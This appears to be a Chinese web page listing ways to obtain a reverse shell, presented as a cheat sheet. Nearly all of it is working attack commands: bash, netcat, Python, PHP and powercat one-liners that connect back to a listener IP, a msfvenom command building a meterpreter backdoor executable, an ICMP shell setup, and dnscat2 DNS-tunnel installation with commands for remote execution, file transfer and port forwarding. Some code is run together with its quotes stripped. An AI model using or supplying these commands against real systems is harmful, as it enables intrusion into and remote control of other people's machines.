您好,欢迎访问一九零五行业门户网

反弹shell有哪些

1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc反弹nc -e /bin/sh 192.168.2.130 4444
3.pythonimport socket,subprocess,oss =socket.socket(socket.af_inet,socket.sock_stream)s.connect(( 192.168.2.130 , 4444 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ /bin/bash , -i ])
4.powercatimport-module .\powercat.ps1powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf生成exe后门msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=4444 -f exe > shell.exe
6.php反弹shellphp -r '$sock=fsockopen(192.168.2.130,4444);exec(/bin/sh -i <&3 >&3 2>&3);'
7.icmp关闭icmp响应,不然shell一直跳,恢复是0sysctl -w net.ipv4.icmp_echo_ignore_all=1python icmpsh_m.py 源 目标python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137
8.dnshttps://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
安装git clone https://github.com/iagox86/dnscat2.gitcd dnscat2cd serversudo gem install bundlerbundle installsudo ruby ./dnscat2.rb
kaliruby dnscat2.rb --dns host=0.0.0.0,port=53531ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=txt --secret=123456(密钥)ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)./dnscat xxx.com
连接成功后
查看记录
选择连接
使用shell
返回选择shell
执行命令
其他命令quit (退出控制台)kill <id> (中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i <id>(连接某个通道)连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
dns隧道转发listen 127.0.0.1:6666 192.168.2.135:80本机的6666就可以访问80端口
以上就是反弹shell有哪些的详细内容。
其它类似信息

推荐信息